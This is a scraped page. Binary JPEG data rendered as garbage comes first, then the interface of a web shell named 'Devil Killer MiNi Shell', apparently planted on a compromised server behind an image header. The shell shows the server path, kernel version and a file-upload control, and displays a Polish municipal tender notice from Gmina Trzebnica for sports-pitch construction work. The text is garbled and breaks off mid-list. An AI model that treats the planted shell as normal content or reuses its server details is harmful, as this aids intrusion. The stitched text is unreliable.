JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231206/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231206/0053629901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa boiska wielofunkcyjnego w Skoroszowie. Modernizacja boisk typu Orlik w Gminie Trzebnica </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Trzebnica</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931935135</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. M. J. Piłsudskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Trzebnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@um.trzebnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.trzebnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa boiska wielofunkcyjnego w Skoroszowie. Modernizacja boisk typu Orlik w Gminie Trzebnica </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5852f73e-942f-11ee-ba3b-4e891c384685</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00536299</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00079243/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.14 Budowa boiska wielofunkcyjnego w Skoroszowie. Modernizacja boisk typu Orlik w Gminie Trzebnica</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/trzebnica <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/trzebnica</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja elektroniczna pomiędzy<br/>Zamawiającym a Wykonawcami odbywać się będzie za pośrednictwem Profilu Nabywcy. Dopuszczalna jest również komunikacja<br/>elektroniczna pomiędzy Zamawiającym a Wykonawcami poprzez pocztę elektroniczną pod adresem e-mail:<br/>przetargi@um.trzebnica.pl. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem<br/>Platformy. Oferty należy składać poprzez Platformę, w sposób określony w rozdziale XVI SWZ. 1. Oferty, oświadczenia, o których<br/>mowa w rozdz. X ust. 1 SWZ, podmiotowe środki dowodowe, o których mowa w rozdz. X ust. 2 SWZ, oświadczenie, o którym mowa<br/>w rozdz. IX ust. 4 SWZ, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w rozdz. VIII ust. 3 SWZ,<br/>przedmiotowe środki dowodowe, pełnomocnictwo, dokumenty, o których mowa w art. 94 ust. 2 ustawy PZP, sporządza się w postaci<br/>elektronicznej, w formatach danych określonych w Rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych<br/>Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz<br/>minimalnych wymagań dla systemów teleinformatycznych (Dz.U. z 2017 r. poz. 2247 t.j.). 2. Informacje, oświadczenia lub<br/>dokumenty, inne niż określone w ust. 1, przekazywane w postępowaniu, sporządza się w postaci elektronicznej, w formatach<br/>określonych w ust. 1 lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji<br/>elektronicznej. 3. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg(.jpeg) ze szczególnym<br/>wskazaniem na .pdf 4. Wykonawca może przekazywać dokumenty w postępowaniu w formacie poddającym dane kompresji.<br/>Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip, .7Z 5. W przypadku przekazywania w postępowaniu dokumentu<br/>elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającego skompresowane dokumenty<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem<br/>wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym. 6. Wśród formatów powszechnych a NIE występujących w rozporządzeniu wymienionym w ust. 1 występują:<br/>.rar .gif .bmp. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie. 7. Ofertę oraz oświadczenie, o którym<br/>mowa w rozdz. X ust. 1 SWZ, składa się, pod rygorem nieważności w jednej z następujących form: a. w formie elektronicznej -<br/>elektroniczny oryginał pliku opatrzony elektronicznym podpisem kwalifikowanym, b. w postaci elektronicznej opatrzonej podpisem<br/>zaufanym, c. w postaci elektronicznej opatrzonej podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że:<br/>• administratorem przekazanych w ofercie oraz wszelkiej dokumentacji wytworzonej potrzeby przeprowadzenia postępowania o<br/>udzielenie zamówienia publicznego danych osobowych jest Burmistrz Gminy Trzebnica, dane będą przetwarzane w Urzędzie<br/>Miejskim w Trzebnicy, pl. M. J. Piłsudskiego 1, 55-100 Trzebnica; • kontakt do inspektora ochrony danych osobowych w Gminie<br/>Trzebnica: iod@um.trzebnica.pl; • dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w ramach postępowania<br/>o udzielenie niniejszego zamówienia publicznego prowadzonego w trybie podstawowym, w związku z powinnością wypełnienia<br/>obowiązku prawnego ciążącego na administratorze, wynikającego z obowiązujących aktów prawnych, w celu: - prawidłowego,<br/>zgodnego z przepisami ustawy PZP oraz przepisami wykonawczymi do wskazanej ustawy, przeprowadzenia postępowania o<br/>udzielenie zamówienia publicznego, obejmującego czynności w szczególności związane z uzyskaniem, weryfikacją i oceną<br/>informacji wskazanych w złożonych ofertach, oświadczeniach, pełnomocnictwach, przedmiotowych i podmiotowych środkach<br/>dowodowych (wraz z ich wyjaśnieniami i uzupełnieniami), - przeprowadzenia czynności kontrolnych, w tym przedłożenia organom<br/>kontrolnym, na potrzeby krajowych oraz zagranicznych instytucji uprawnionych do podejmowania czynności kontrolnych związanych<br/>ze sprawdzeniem zgodności postępowania o udzielenie zamówienia z przepisami ustawy PZP oraz prawidłowym wydatkowaniem<br/>środków publicznych, w tym środków pochodzących z budżetu Unii Europejskiej, - wypełnienia obowiązków wynikających z dostępu<br/>do informacji publicznej, zgodnie z ustawą z dnia 6 września 2001 o dostępie do informacji publicznej (Dz.U. z 2020, poz. 2176 t.j. z<br/>późn. zm.); • odbiorcami danych osobowych zawartych w dokumentacji z postępowania o udzielenie zamówienia publicznego będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy<br/>PZP, a także po zakończeniu niniejszego postępowania o udzielenie zamówienia publicznego w ramach dostępu do informacji<br/>publicznej, z wyłączeniem danych skutecznie zastrzeżonych jako tajemnica przedsiębiorstwa. Zamawiający zwraca uwagę, że nie<br/>wszystkie dane osobowe zawarte w ofercie złożonej w postępowaniu mogą zostać zastrzeżone. Zakres danych osobowych, które<br/>nie mogą podlegać zastrzeżeniu określa art. 222 ust. 5 ustawy PZP (nazwy(firmy) oraz adresy Wykonawców). Wszelkie dane<br/>osobowe mogą zostać ujawnione właściwym organom upoważnionym do ich przetwarzania zgodnie z obowiązującym prawem;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">• dane osobowe będą przechowywane przez okres przewidziany w art. 78 ustawy PZP, a<br/>następnie archiwizowane zgodnie z przepisami prawa. W przypadku, gdy zamówienie jest współfinansowane ze środków UE, dane będą przechowywane przez okres trwałości projektu, wynikający z umowy o dofinansowanie. • obowiązek podania danych<br/>osobowych bezpośrednio dotyczących osób fizycznych jest wymogiem ustawowym określonym w przepisach ustawy PZP,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy PZP. Podanie danych osobowych jest dobrowolne, jednakże niepodanie danych uniemożliwia prawidłowe<br/>złożenie oferty w ramach postępowania o udzielenie zamówienia publicznego. W przypadkach określonych przez Zamawiającego<br/>(konkretne wymagania w danym postępowaniu) niepodanie części danych uniemożliwi również ocenę złożonych ofert w ramach<br/>przyjętych przez Zamawiającego kryteriów oceny, jak również weryfikację spełnienia przez Wykonawców warunków udziału w<br/>postępowaniu; • w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, jak również dane<br/>osobowe nie będą podlegały profilowaniu, stosowanie do art. 22 RODO; • wszystkie osoby fizyczne, których dane osobowe są<br/>wymienione w postępowaniu o udzielenie zamówienia publicznego mają: - na podstawie art. 15 RODO prawo dostępu do swoich<br/>danych osobowych; − na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych; − na podstawie art. 18 RODO<br/>prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w<br/>art. 18 ust. 2 RODO ; − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy osoba, której dane<br/>dotyczą uzna, że przetwarzanie jej danych narusza przepisy RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.31.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest:<br/>•	Zadanie I - Modernizacja dwóch obiektów sportowych typu Orlik, zlokalizowanych na terenie Gminy Trzebnica, zgodnie z opisem zawartym w załączniku nr 1 do SWZ - Opis Przedmiotu Zamówienia, zwanym dalej: „OPZ”.<br/><br/>2. W zakres zamówienia wchodzi wykonanie między innymi:<br/>ZADANIE I – Modernizacja dwóch obiektów sportowych typu Orlik zlokalizowanych na terenie Gminy Trzebnica <br/>1. Modernizacja boiska sportowego typu ORLIK w Ujeźdźcu Wielkim<br/>a) gruntowne wyczyszczenie granulatu oraz piasku kwarcowego za pomocą specjalistycznej maszyny i uzupełnienie wypełnienia trawy syntetycznej granulatem w ilości 2 tony,<br/>b) wymiana siatek na piłkochwytach głównych z osprzętem,<br/>c) wymiana opraw na nowe LEDowe,<br/>d) utylizacja materiałów z rozbiórki<br/>2. Modernizacja boiska sportowego typu ORLIK w Trzebnicy<br/>a) wymiana trawy syntetycznej<br/> i. demontaż i utylizacja istniejącej trawy syntetycznej,<br/> ii. rozebranie obrzeży trawnikowych,<br/> iii. wykonanie ławy betonowej pod ściankę oporową po obrysie boiska,<br/> iv. montaż ścianki oporowej żelbetowej L-50 o wymiarach 49x30 cm z wypełnieniem spoin,<br/> v. wykonanie dolnej warstwy podbudowy z kruszyw łamanych o uziarnieniu 4-31,5 grubości po zagęszczeniu 20 cm,<br/> vi. wykonanie górnej warstwy podbudowy z miału kamiennego o grubości po zagęszczeniu 3 cm,<br/> vii. dostarczenie i ułożenie trawy syntetycznej o parametrach opisanych w OPZ,<br/> vii. wypełnienie trawy syntetycznej piaskiem kwarcowym oraz granulatem EPDM,<br/> b) pozostałe roboty przy boiskach<br/> i. wymiana opraw na nowe LEDowe o parametrach opisanych w OPZ,<br/>ii. wymiana siatki na piłkochwycie głównym z osprzętem (od strony parkingu),<br/>iii. wymiana siatki na piłkochwycie bocznym z osprzętem,<br/>iv. zakup i dostarczenie słupków wraz z siatką do koszykówki,<br/>v. utylizacja materiałów z rozbiórki,<br/>c) remont schodów i podjazdu dla osób niepełnosprawnych<br/> i. uzupełnienie tynków zewnętrznych i rozebranie posadzek z płytek,<br/> ii. ułożenie nowych posadzek wraz z cokolikami z płytek ceramicznych 30x30 cm<br/> układanych na klej na schodach zewnętrznych, podjeździe dla osób niepełnosprawnych i podeście,<br/> iii. wykonanie wyprawy z tynku elewacyjnego cienkowarstwowego akrylowego na ściankach bocznych podjazdu dla osób niepełnosprawnych,<br/> iv. wykonanie zabezpieczenia antykorozyjnego i powłoki malarskiej na barierkach dla osób niepełnosprawnych<br/> d) roboty dodatkowe<br/>i. montaż grodzenia z siatki no rozstawie 3 m i wysokości dostosowanej do istniejącego ogrodzenia od strony parkingu (ok. 3 m),<br/>ii. montaż bramy z furtką o wym. 250x250 cm,<br/>iii. montaż stopni blokowych betonowych o wymiarach 15x35x100 cm pod bramą jw,<br/>iv. zakup o dostawa najazdu dla samochodów osobowych i dostawczych o wysokości 23 cm i nośności do 3,5 t. Najazd stalowy ocynkowany przenośny.<br/><br/><br/>UWAGA!!! <br/>1) Wykonawca zobowiązany jest do wykonania odkrywek w trzech wskazanych punktach istniejącej rury wodociągowej przebiegającej pod boiskiem celem dokonania inspekcji jej stanu technicznego przez przedstawicieli Zamawiającego. <br/>2) Nawierzchnia poliuretanowa oraz warstwa stabilizująca mają spełniać wymagania ujęte w dokumentacji projektowej oraz być zgodne z normą PN–EN 14877:2014 lub jej równoważną.<br/>3) Zamawiający dopuszcza jako rozwiązanie równoważne dla trawy syntetycznej produkt o następujących parametrach:<br/>•	Typ produkcji : tuftowana,<br/>•	Podkład : poliuretanowy<br/>•	Ciężar całkowity nawierzchni na m2 – min. 2 700 g<br/>•	Waga włókien na m2 – min. 1 500 g<br/>•	Rodzaj i skład włókien – włókna proste monofilowe, 100% PE,<br/>•	Grubość włókien – min. 360 mikronów<br/>•	Ilość pęczków na m2 – min. 10 000 szt.<br/>•	Ilość włókien na m2– min. 142 000 szt.<br/>•	łączenie klejone po starzeniu: min. 150 N/ 100mm<br/>•	siła wyrywania pęczka trawy po starzeniu: min. 75N<br/>•	Wysokość włókna ponad podkładem : 45mm<br/>•	Ciężar włókna (dtex) – min. 14 000<br/>•	Kolor – dwa odcienie zieleni (dwa rodzaje włókien)<br/>•	Przepuszczalność wody dla kompletnego systemu – min. 1500 mm/h<br/>•	Mata elastyczna shockpad prefabrykowana 10mm<br/><br/>3. Szczegółowy opis przedmiotu zamówienia: <br/>•	dla zadania I stanowią zapisy w § 1 i 2 wzoru umowy stanowiącego załącznik nr 4 do SWZ oraz OPZ oraz przedmiar robót stanowiący załącznik nr 1 do OPZ<br/>•	dla zadania II stanowią zapisy w § 1 i 2 wzoru umowy stanowiącego załącznik nr 4 do SWZ oraz OPZ w tym projektu, STWiOR, sporządzonych przez Jednostkę projektowania. Przedmiar robót jest materiałem pomocniczym i nie stanowi elementu opisu przedmiotu zamówienia <br/>4.	Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych we wzorze umowy stanowiącym załącznik nr 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212200-8 - Roboty budowlane w zakresie budowy obiektów sportowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112720-8 - Roboty w zakresie kształtowania terenów sportowych i rekreacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta (w przypadku dopuszczenia składania ofert<br/>częściowych - w zakresie każdego zadania oddzielnie) zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>a) „Łączna cena ofertowa brutto” – C;<br/>b) „Okres gwarancji” – G.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest:<br/><br/>•	Zadanie II - Budowa boiska wielofunkcyjnego w miejscowości Skoroszów na terenie dz. nr 210/1 AM-1 na podstawie dokumentacji projektowej sporządzonej przez: Inargo Pracownia Projektowa Wojciech Hercuń, z siedzibą w Trzebnicy, 55-100 Trzebnica, zwaną dalej „Jednostką projektowania”.<br/>2. W zakres zamówienia wchodzi wykonanie między innymi:<br/>ZADANIE II – Budowa boiska wielofunkcyjnego w Skoroszowie<br/>a)	nawierzchni ciągów pieszych, w tym:<br/>i. robót ziemnych,<br/>ii. ław pod krawężniki,<br/>iii. montaż obrzeży betonowych o wymiarach 30x8 cm na ławie betonowej,<br/>iv. wzmocnienia podłoża piaskiem stabilizowanym cementem o gr. warstwy 10 cm (zgodnie z rys. A_07),<br/>v. podbudowy z kruszywa łamanego o frakcji 0/31,5 o gr. warstwy 15 cm (zgodnie z rys. A_07),<br/>vi. ułożenie kostki betonowej w kolorze szarym o gr. 6 cm na podsypce cementowo - piaskowej o gr. warstwy 5 cm (zgodnie z rys. A_07);<br/>b)	nawierzchni sportowej, w tym:<br/>i. robót ziemnych,<br/>ii. obrzeży betonowych o wymiarach 30x8 cm na ławie betonowej, <br/>iii. zagęszczonej podsypki piaskowej (warstwa odsączająca) o gr. warstwy 25 cm (zgodnie z rys. A_07),<br/>iv. podbudowy z kruszywa łamanego frakcji 4,0-31,0 mm o gr. warstwy 12 cm (zgodnie z rys. A_07),<br/>v. podbudowy z kruszywa łamanego frakcji 0,1-5 mm o gr. warstwy 3 cm (zgodnie z rys. A_07),<br/>vi. podbudowę systemową – warstwę stabilizującą typu ET układaną mechanicznie o gr. 35 mm jako mieszankę żwiru suszonego (2-5 mm), granulatu gumowego SBR (1-4 mm) i kleju (żywicy poliuretanowej),<br/>vii. nawierzchni poliuretanowej bezspoinowej o gr. 10 cm z granulatu kauczukowego EPDM o średnicy 1-4 mm i żywicy poliuretanowej,<br/>viii. malowania linii segregacyjnych o szerokości 5 cm boisk do piłki ręcznej i siatkowej(zgodnie z rys. A_01);<br/>c)	wyposażenia boisk, w tym:<br/>i. wykonanie fundamentów betonowych z betonu żwirowego B20 pod słupki bramek piłki ręcznej, siatkówki i koszykówki,<br/>ii. zakup i osadzenie tulei pod słupki piłki ręcznej, uniwersalnej siatkówki i tenisa,tablic koszykówki,<br/>iii. zakup i ustawienie w gotowych tulejach bramek do piłki ręcznej, tablic koszykówki oraz słupków piłki siatkowej 